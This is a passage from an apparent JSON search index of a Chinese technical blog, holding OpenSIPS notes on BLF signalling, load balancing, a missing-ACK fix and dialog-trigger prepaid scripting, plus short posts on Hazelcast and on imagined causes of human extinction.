direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;terminated\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:0000000000@192.168.2.53\u0026lt;/identity\u0026gt;\u0026lt; rget uri=\u0026#34;sip:0000000000@192.168.2.53\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; 参考 https://www.opensips.org/Documentation/Tutorials-Presence-PuaDialoinfoConfig https://www.yuque.com/wangdd/fyikfz/qs2vqx https://tools.ietf.org/html/rfc4235 ","permalink":"https://wdd.js.org/opensips/ch9/blf-note/","summary":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往时例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有再打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 
1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.","title":"BLF功能笔记"},{"content":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations. 
To be more precise, when routing, OpenSIPS will consider the less loaded destination not the destination with the smallest number of ongoing calls, but the destination with the largest available slot.\nAlso, the \u0026ldquo;load-balancing\u0026rdquo; (LB) module is able to receive feedback from the destinations (if they are capable of it). This mechanism is used for notifying OpenSIPS when the maximum capacity of a destination changed (like a GW with more or less E1 cards).\nThe \u0026ldquo;load-balancing\u0026rdquo; functionality comes to enhance the \u0026ldquo;dispatcher\u0026rdquo; one. The difference comes in having or not load information about the destinations where you are routing to:\nDispatcher has no load information - it just blindly forwards calls to the destinations based on a probabilistic dispersion logic. It gets no feedback about the load of the destination (like how many calls that were sent actually were established or how many are still going). Load-balancer is load driven - LB routing logic is based primarily on the load information. The LB module is using the DIALOG module in order to keep track of the load (ongoing calls). 2. Load Balancing - how it works When looking at the LB implementation in OpenSIPS, we have 3 aspects:\n2.1 Destination set A destination is defined by its address (a SIP URI) and its description as capacity.\nFrom the LB module perspective, the destinations are not homogeneous - they are not alike; and not only from capacity point of view, but also from what kind of services/resources they offer. For example, you may have a set of Yate/Asterisk boxes for media-related services - some of them are doing transcoding, other voicemail or conference, other simple announcement, other PSTN termination. But you may have mixed boxes - one box may do PSTN and voicemail at the same time. 
So each destination from the set may offer a different set of services/resources.\nSo, for each destination, the LB module defines the offered resources, and for each resource, it defines the capacity / maximum load as number of concurrent calls the destination can handle for that resource.\nExample: 4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN id group_id dst_uri resources 1 1 sip:yate1.mycluster.net transc=30; pstn=32 2 1 sip:yate2.mycluster.net vm=100; transc=10 3 1 sip:yate3.mycluster.net vm=50; conf=300 4 1 sip:yate4.mycluster.net vm=10;conf=10;transc=10;pstn=32 For runtime, the LB module provides MI commands for:\nreloading the definition of destination sets changing the capacity for a resource for a destination 2.2 Invoking Load-balancing Using the LB functionality is very simple - you just have to pass to the LB module what kind of resources the call requires.\nThe resource detection is done in the OpenSIPS routing script, based on whatever information is appropriated. For example, looking at the RURI (dialed number) you can see if the call must go to PSTN or if it a voicemail or conference number; also, by looking at the codecs advertised in the SDP, you can figure out if transcoding is or not also required.\nif (!load_balance(\u0026#34;1\u0026#34;,\u0026#34;transc;pstn\u0026#34;)) { sl_send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } The first parameter of the function identifies the LB set to be used (see the group_id column in the above DB snapshot). Second parameter is list of the required resource for the call. 
A third optional parameter may be passed to instruct the LB engine on how to estimate the load - in absolute value (how many channels are used) or in relative value (how many percentages are used).\nThe load_balance() will automatically create the dialog state for the call (in order to monitor it) and will also allocate the requested resources for it (from the selected box).\nThe function will set as destination URI ($du) the address of the selected destination/box.\nThe resources will be automatically released when the call terminates. The LB module provides an MI function that allows the admin to inspect the current load over the destinations.\n2.3 The LB logic The logic used by the LB module to select the destination is:\ngets the destination set based on the group_id (first parameter of the load_balance() function) selects from the set only the destinations that are able to provide the requested resources (second parameter of the load_balance() function) for the selected destinations, it evaluates the current load for each requested resource the winning destination is the one with the biggest value for the minimum available load per resource. 
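The selection rule above (keep only destinations offering every requested resource, compute each one's available slots per resource, take the per-destination minimum, pick the largest minimum) can be sketched in plain Python. This is an illustrative sketch only, not OpenSIPS code; the function and variable names are mine, and the capacity/load numbers mirror the 4-box example used in this tutorial:

```python
# Sketch of the LB selection rule: for each qualifying destination,
# compute available slots (capacity - load) per requested resource,
# take the minimum across resources, and pick the destination with
# the largest such minimum.

def pick_destination(destinations, load, required):
    best, best_avail = None, -1
    for name, capacity in destinations.items():
        # only destinations offering every required resource qualify
        if not all(r in capacity for r in required):
            continue
        avail = min(capacity[r] - load[name][r] for r in required)
        if avail > best_avail:
            best, best_avail = name, avail
    return best, best_avail

destinations = {
    "yate1": {"transc": 30, "pstn": 32},
    "yate2": {"vm": 100, "transc": 10},
    "yate3": {"vm": 50, "conf": 300},
    "yate4": {"vm": 10, "conf": 10, "transc": 10, "pstn": 32},
}
# current load, as in the tutorial's worked example
load = {
    "yate1": {"transc": 10, "pstn": 18},
    "yate4": {"transc": 9, "pstn": 16},
}
print(pick_destination(destinations, load, ["transc", "pstn"]))
# → ('yate1', 14): min(20, 14) = 14 beats yate4's min(1, 16) = 1
```

Only boxes (1) and (4) qualify for `transc;pstn`, and box (1) wins with 14 available slots on its most loaded resource.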
Example:\n4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN when calling load_balance(\u0026ldquo;1\u0026rdquo;,\u0026ldquo;transc;pstn\u0026rdquo;) -\u0026gt;\nonly boxes (1) and (4) will be selected, as they offer both transcoding and pstn evaluating the load : (1) transcoding - 10 channels used; PSTN - 18 used (4) transcoding - 9 channels used; PSTN - 16 used evaluating available load (capacity-load) : - (1) transcoding - 20 channels available; PSTN - 14 available - (4) transcoding - 1 channel available; PSTN - 16 available for each box, the minimum available load (through all resources) (1) 14 (PSTN) (4) 1 (transcoding) final selected box is (1) as it has the biggest (=14) available load for the most loaded resource.\nThe selection algorithm tries to avoid the intensive usage of a resource per box.\n2.4 Disabling and Pinging The Load Balancer module provides a couple of functionalities to help in dealing with failures of the destinations. The actual detection of a failed destination (based on the SIP traffic) is done in the OpenSIPS routing script by looking at the codes of the replies you receive back from the destinations (see the example at the end of the tutorial). Once a destination is detected as failed, in script, you can mark it as disabled via the lb_disable() function - once marked as disabled, the destination will not be used anymore in the LB process (it will not be considered a possible destination when routing calls). For a destination to be set back as enabled, there are two options:\nuse the MI command lb_status to do it manually, from outside OpenSIPS based on probing - the destination must have the SIP probing/pinging enabled - once the destination starts replying with 200 OK replies to the SIP pings (see the probing_reply_codes option). 
To enable pinging, you need first to set probing_interval to a non zero value - how often the pinging should be done. The pinging will be done by periodically sending a OPTIONS SIP request to the destination - see probing_method option.To control which and when a destination is pinged, there is the probe_mode column in the load_balancer table - see table definition. Possible options are:\n0 no pinging at any time 1 ping only if in disabled state (used for auto re-enabling of destinations) 2 ping all the time - it will disable destination if fails to answer to pings and enable it back when starts answering again. 2.5 RealTime Control over the Load Balancer The Load Balancer module provides several MI functions to allow you to do runtime changes and to get realtime information from it.Pushing changes at runtime:\nlb_reload - force reloading the entire configuration data from DB - see more.. lb_resize - change the capacity of a resource for a destination - see more.. lb_status - change the status of a destination (enable/disable) - see more.. For fetching realtime information :\nlb_list - list the load on all destinations (per resource) - see more.. lb_status - see the status of a destination (enable/disable) - see more.. 3. Study Case: routing the media gateways Here is the full configuration and script for performing LB between media peers.\n3.1 Configuration Let\u0026rsquo;s consider the following case: a cluster of media servers providing voicemail service and PSTN (in and out) service. 
So the boxes will be able to receive calls for Voicemail or for PSTN termination, but they will be able to send back calls only for PSTN inbound.\nWe also want the destinations to be disabled from script (when a failure is detected); The re-enabling of the destinations will be done based on pinging - we do pinging only when the destination is in \u0026ldquo;failed\u0026rdquo; status.\n4 destinations/boxes in the LB set\noffers 50 channels for voicemail and 32 for PSTN offers 100 voicemail channels offers 50 voicemail channels offers 10 voicemail and 64 PSTN This translated into the following setup:\nid group_id dst_uri resources prob_mode 1 1 sip:yate1.mycluster.net vm=50; pstn=32 1 2 1 sip:yate2.mycluster.net vm=100 1 3 1 sip:yate3.mycluster.net vm=50 1 4 1 sip:yate4.mycluster.net vm=10;pstn=64 1 3.2 OpenSIPS Scripting debug=1 memlog=1 fork=yes children=2 log_stderror=no log_facility=LOG_LOCAL0 disable_tcp=yes disable_dns_blacklist = yes auto_aliases=no check_via=no dns=off rev_dns=off listen=udp:xxx.xxx.xxx.xxx:5060 # REPLACE here with right values loadmodule \u0026#34;modules/maxfwd/maxfwd.so\u0026#34; loadmodule \u0026#34;modules/sl/sl.so\u0026#34; loadmodule \u0026#34;modules/db_mysql/db_mysql.so\u0026#34; loadmodule \u0026#34;modules/tm/tm.so\u0026#34; loadmodule \u0026#34;modules/uri/uri.so\u0026#34; loadmodule \u0026#34;modules/rr/rr.so\u0026#34; loadmodule \u0026#34;modules/dialog/dialog.so\u0026#34; loadmodule \u0026#34;modules/mi_fifo/mi_fifo.so\u0026#34; loadmodule \u0026#34;modules/mi_xmlrpc/mi_xmlrpc.so\u0026#34; loadmodule \u0026#34;modules/signaling/signaling.so\u0026#34; loadmodule \u0026#34;modules/textops/textops.so\u0026#34; loadmodule \u0026#34;modules/sipmsgops/sipmsgops.so\u0026#34; loadmodule \u0026#34;modules/load_balancer/load_balancer.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) 
modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;rr\u0026#34;,\u0026#34;enable_double_rr\u0026#34;,1) modparam(\u0026#34;rr\u0026#34;,\u0026#34;append_fromtag\u0026#34;,1) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # ping every 30 secs the failed destinations modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_interval\u0026#34;, 30) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_from\u0026#34;, \u0026#34;sip:pinger@LB_IP:LB_PORT\u0026#34;) # consider positive ping reply the 404 modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_reply_codes\u0026#34;, \u0026#34;404\u0026#34;) route{ if (!mf_process_maxfwd_header(\u0026#34;3\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;looping\u0026#34;); exit; } if ( has_totag() ) { # sequential request -\u0026gt; obey Route indication loose_route(); t_relay(); exit; } # handle cancel and re-transmissions if ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } # from now on we have only the initial requests if (!is_method(\u0026#34;INVITE\u0026#34;)) { send_reply(\u0026#34;405\u0026#34;,\u0026#34;Method Not Allowed\u0026#34;); exit; } # initial request record_route(); # not really necessary to create the dialog from script (as the # LB functions will do this for us automatically), but we do it # if we want to pass some flags to dialog (pinging, bye, etc) create_dialog(\u0026#34;B\u0026#34;); # check the direction of call if ( lb_is_destination(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;) ) { # call comes from our cluster, so it is an PSNT inbound call # mark it as load on the corresponding destination lb_count_call(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;, \u0026#34;pstn\u0026#34;); # and route is to 
our main sip server to send call to end user $du = \u0026#34;sip:PROXY_IP:PROXY_PORT\u0026#34;; # REPLACE here with right values t_relay(); exit; } # detect resources and store in an AVP if ( $rU=~\u0026#34;^VM_\u0026#34; ) { # looks like a VoiceMail call $avp(lb_res) = \u0026#34;vm\u0026#34;; } else if ( $rU=~\u0026#34;^[0-9]+$\u0026#34; ) { # PSTN call $avp(lb_res) = \u0026#34;pstn\u0026#34;; } else { send_reply(\u0026#34;404\u0026#34;,\u0026#34;Destination not found\u0026#34;); exit; } # LB function returns negative if no suitable destination (for requested resources) is found, # or if all destinations are full if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;Selected destination is: $du\\n\u0026#34;); # arm a failure route to be able to catch a failure event and to do # failover to the next available destination t_on_failure(\u0026#34;LB_failed\u0026#34;); # send it out if (!t_relay()) { sl_reply_error(); } } failure_route[LB_failed] { # skip if call was canceled if (t_was_cancelled()) { exit; } # was a destination failure ? 
(we do not want to do failover # if it was a call setup failure, so we look for 500 and 600 # class replied and for local timeouts) if ( t_check_status(\u0026#34;[56][0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;) ) ) { # this is a case for failover xlog(\u0026#34;REPORT: LB destination $du failed with code $T_reply_code\\n\u0026#34;); # mark failed destination as disabled lb_disable(); # try to re-route to next available destination if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;REPORT: re-routing call to $du \\n\u0026#34;); t_relay(); } } ","permalink":"https://wdd.js.org/opensips/blog/load-balance/","summary":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). 
OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations.","title":"Load Balancing in OpenSIPS"},{"content":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我又仔细地分析了一下SIP抓包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这时我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的vars.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误地使用了fix_nated_contact。务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contact。对于这个请求的响应,则不需要进行NAT处理。\n深入思考一下,为什么contact头修改错了,往往ack就会有问题呢? 
实际上ack请求的url部分,就是来自响应消息的contact头的url部分。\n","permalink":"https://wdd.js.org/opensips/ch7/miss-ack/","summary":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我又仔细地分析了一下SIP抓包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这时我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的vars.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误地使用了fix_nated_contact。务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contact。对于这个请求的响应,则不需要进行NAT处理。\n深入思考一下,为什么contact头修改错了,往往ack就会有问题呢? 实际上ack请求的url部分,就是来自响应消息的contact头的url部分。","title":"ACK 无法正常送到FS"},{"content":"","permalink":"https://wdd.js.org/posts/2021/03/ewinve/","summary":"","title":"stompjs 心跳机制调研"},{"content":"IMDG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data. With all relevant information in RAM in an IMDG, there is no need to traverse a network to remote storage for transaction processing. The difference in speed is significant – minutes vs. 
sub-millisecond response times for complex transactions done millions of times per second.\n参考 https://hazelcast.com/products/imdg/ 管理中心 https://github.com/hazelcast/management-center-docker https://github.com/hazelcast/hazelcast-docker https://github.com/hazelcast/hazelcast-nodejs-client/blob/master/DOCUMENTATION.md https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html 文档 https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html ","permalink":"https://wdd.js.org/posts/2021/02/xlwnvv/","summary":"IDMG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data.","title":"hazelcast IDMG"},{"content":"","permalink":"https://wdd.js.org/posts/2021/02/egkbht/","summary":"","title":"macbook pro 1708 换电池记录"},{"content":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》来自日本作家高野和明的科幻小说给出系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 于三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。\n","permalink":"https://wdd.js.org/posts/2021/02/ploder/","summary":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》来自日本作家高野和明的科幻小说给出系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 
日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 于三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。","title":"人类灭绝的7种方式"},{"content":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. By data we mean here dialog specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended be used for storing a lot of information during the calls).Let’s take a quick look at a couple of such scenarios:\nattended call transfer – the new call may need to import data (about the involved parties) from the old dialog; call parking – the retrieving call will need to import a lot of data (again, about the parties involved and the nature of the call) from the parked call call pickup – the picking up call will also have to access data from the ringing calls in order to find them, check permissions and grab one call. Scratching the surface, before OpenSIPS 3.1 The pre 3.1 OpenSIPS versions had some limited possibilities when comes to accessing the data from other dialogs.Historically speaking, the first attempt was the get_dialog_info() function, a quite primitive approach that allows you, using the dialog variables, to find a dialog and to retrieve from it only one dialog variable. 
Even so, this function served the purpose of addressing scenarios where you wanted to group dialogs around custom values – this solved the problem of a front-end OpenSIPS balancer trying to group all calls of a conf room on the same conf server, or trying to group the calls of a user on the same PBX (so call transfer will work). But there were some limitations in terms of scalability (only one value was retrieved) and usage, on how the dialogs were referred (by dlg variables, not by the more natural call-id). So we had the next wave of functions that addressed those issues: the get_dialog_vals(), get_dialogs_by_val() or get_dialogs_by_profile() functions. They somehow solved the problem, allowing a more versatile way of referring/identifying the dialogs and allowing bulk access to the dialog data, but still, not all dialog data was accessible and the way the data was returned (in complex arrays or JSON strings) makes them difficult to use.\nThe true solution, with OpenSIPS 3.1 So back to the drawing board. And the correct solution to the problem (of inter dialog data accessing) came from a totally different, much simpler approach – give direct access to the dialog context, so every piece of dialog data will be accessible via the regular dialog functions/variables/profiles/flags/etc. So, OpenSIPS 3.1 gives you the possibility to load the context of a different dialog, so you can retrieve whatever data without the need of additional functions or special data packing or re-formatting. Two simple functions were added, the load_dialog_ctx() and unload_dialog_ctx(). These two functions may be used to define a region in your script where “you see” a different dialog than the current one (dictated by the SIP traffic). Inside that region, all the dialog functions and variables will operate on the other dialog. 
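As a rough sketch of how such a region could look in an OpenSIPS routing script (illustrative only: $var(other_callid) is a hypothetical variable assumed to hold the call-id of the other dialog, and $dlg_val(account_id) a dialog variable assumed to exist on that dialog):

```
# load the context of another dialog, identified by its call-id
if ( load_dialog_ctx("$var(other_callid)") ) {
    # inside this region, dialog functions and variables
    # refer to the loaded dialog, not the current one
    xlog("peer dialog data: $dlg_val(account_id)\n");
    # restore the current dialog's context
    unload_dialog_ctx();
}
```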
Simple and very handy, right ?To make it even better, the OpenSIPS 3.1 gives you more than only the access to another dialog context – it gives you the possibility to**_ access the accounting context of another call_**. Shortly, you can access the accounting variables (extra data or per-leg data) of a different call – isn’t that cool ?This can be done via the acc_load_ctx_from_dlg() and acc_unload_ctx_from_dlg() functions, in the similar way to the loading/unloading the dialog context. Inside the region defined by these new accounting function, you will “see” the accounting data of another call.\nExample Let’s take the example of an attended transfer, when handling the transferring call. This snippet will show we can get access to various dialog and accounting data from the transferred dialog , while handling the transferring dialog.\n","permalink":"https://wdd.js.org/opensips/blog/cross-dialog-data/","summary":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. 
By data we mean here dialog specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended be used for storing a lot of information during the calls).","title":"Cross-dialog data accessing"},{"content":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more).So why not using the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support?For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated. The routes are optional and per-dialog and they give you the possibility to attach custom operations to the various critical milestones in a dialog life.While the on_answer and on_hangup routes are 100% data-manipulation oriented (you have full read/write access to the full data context of the dialog, but you cannot change anything about the dialog progress), the on_timeout route is a bit more versatile – by increasing the dialog’s timeout, you can dynamically increase the dialog lifetime (to postpone the dialog timeout, without waiting for any signalling to do it).But let’s talk example 🙂\nSimple PrePaid Using the on_timeout route, we can simulate the incremental check and charge behavior of a basic prepaid.For example, we set 5 seconds timeout for the dialog and when the on_timeout route is triggered (after the 5 secs), we can re-check if the caller still have credit to continue the call. If not, we leave the call to timeout, to be terminated by the OpenSIPS. 
If he still has credit, we deduct the cost for 5 secs more and we increase the dialog timeout by 5 more seconds. Simple, right?\nroute { .... create_dialog(\u0026#34;B\u0026#34;); # remember some billing account id, to remember # where to check for credit $dlg_val(account_id) = \u0026#34;...\u0026#34;; # keep a running cost for the call also $dlg_val(total_cost) = 0; # start with an initial 5 seconds duration $DLG_timeout = 5; t_on_timeout(\u0026#34;call_recheck\u0026#34;); t_on_hangup(\u0026#34;call_terminated\u0026#34;); .... } route[call_recheck] { # the dialog data (vars, flags, profiles) are accessible here. xlog(\u0026#34;[$DLG_id] dialog timeout triggered\\n\u0026#34;); # calculate the cost for the next 5 seconds $var(cost) = 5 * .... ; # use a critical/locked region to do test and update upon the credit get_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); if (avp_db_query(\u0026#34;select credit from accounts where credit\u0026gt;=$var(cost) and id=$dlg_val(account_id)\u0026#34;)) { # credit is still available avp_db_query(\u0026#34;update accounts set credit=credit-$var(cost) where id=$dlg_val(account_id)\u0026#34;); # give the dialog 5 more seconds $DLG_timeout = 5; # update the total cost $dlg_val(total_cost) = $(dlg_val(total_cost){s.int}) + $var(cost); } else { # query returned nothing, so no credit is available, allow the call # to timeout and terminate right away } release_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); } route[call_terminated] { # the dialog data (vars, flags, profiles) are accessible here. 
